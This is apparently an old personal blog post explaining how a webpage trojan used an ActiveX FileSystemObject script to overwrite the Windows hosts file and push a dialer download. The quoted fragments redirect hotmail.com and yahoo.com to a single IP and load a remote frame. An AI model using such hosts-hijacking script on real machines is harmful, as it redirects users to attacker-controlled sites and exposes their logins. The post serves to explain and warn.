The most likely way for
the world to be destroyed, most experts agree, is by accident. That’s
where we come in; we’re computer professionals. We cause accidents.
Intro
Earlier this year there was a write up regarding the ‘localhost’ troubles, experienced in February.
As suggested in that posting, apparantly the problems were in
a webpage (Best-Greetings) that had a hidden script (Java or VB)
that overwrote the localhost file. Not being able to recover
the page from IE’s cache and thanks to fast action from Direct-Nic (who
pulled the pages before more ‘damage’ was done) there was only the big
question ‘how it actually happened’. Any programmer would be interested
in finding the answere to that question. The answer came in, just
today: a referer in my referers page came from a searchengine (CometSystems): The page in question also had a link to a page of a site maintained by Norman De Forest. Finally a conclusion that has been bothering the author since February.
It’s a bird, it’s a plane, it’s a script (and such).
My first assumption was correct: a script that triggers
something to write (or rather rewrite) the host file. That
‘something’ here is an ActiveX object: I don’t think JavaScript has
explicitly access to the (Windows) filesystem. The trick is in the
following code (fragment quoted from Norman’s page):
function savefavfile(folder,label,url,icofile,iconum)
var oFi=FSO.CreateTextFile(folder+”\hosts”);
oFi.WriteLine(“64.154.222.199 hotmail.com”);
oFi.WriteLine(“64.154.222.199 yahoo.com”);
[…]
Hosts file? Basically a hosts file allows the
‘Internet’ software to quickly connect to a website, skipping the
process of a ‘domain name look-up’. For a layman’s description what it
exactly does, you may want to check here.
It’s a script, a frame and a download.
The next part that comes in mind, is the part that my wife
constantly was bothered with a dialogbox asking her if she wanted to
download a program. If I remember correctly the dialog was in German
and it looked like a real ‘signed’ certificate. Back to Norman’s page:
[FRAMESET rows=”100%,*” framespacing=0 frameborder=”no”]
[FRAME SRC=”http://209.1.225.218/myfiles/amy.txt” noresize ]
[FRAME src=”dialer.php” noresize]
[/frameset]
The site in questions asks the user to download an executable.
Apparantly there was a check if the program was already installed, but
I don’t recall this: we skipped this part here, and by that time I was
already cleaning out the hosts file.
Neat-o.
I must admit that that particular night, I was surprised by the
boldness of the ‘trick’. As a programmer you try to keep up to several
flaws on a ‘flawed’ system that is Windows. You easily
overlook holes like these: and with a ‘social engineering part’ (a
part we have seen in many ‘scripting virusses’), it’s nearly impossible
to keep track of what regular users have done to ‘upset their own
computers’. However, the most worrying part is that most
users have never heard of the ‘hosts’ file, let alone what the use is
of that file. Ask yourself the following: if ordinary people would
have known about the workings of the ‘hosts’ file, they would have
recognized the symptoms as described above.
Links/Acknowledgements:
Norman De Forest page with the complete description of the trojan (recommended reading, 100K).
Thread at Google groups, as suggested by Norman.
Gorilla Design’s hosts file explanation in layman’s terms
First discussion on this blog.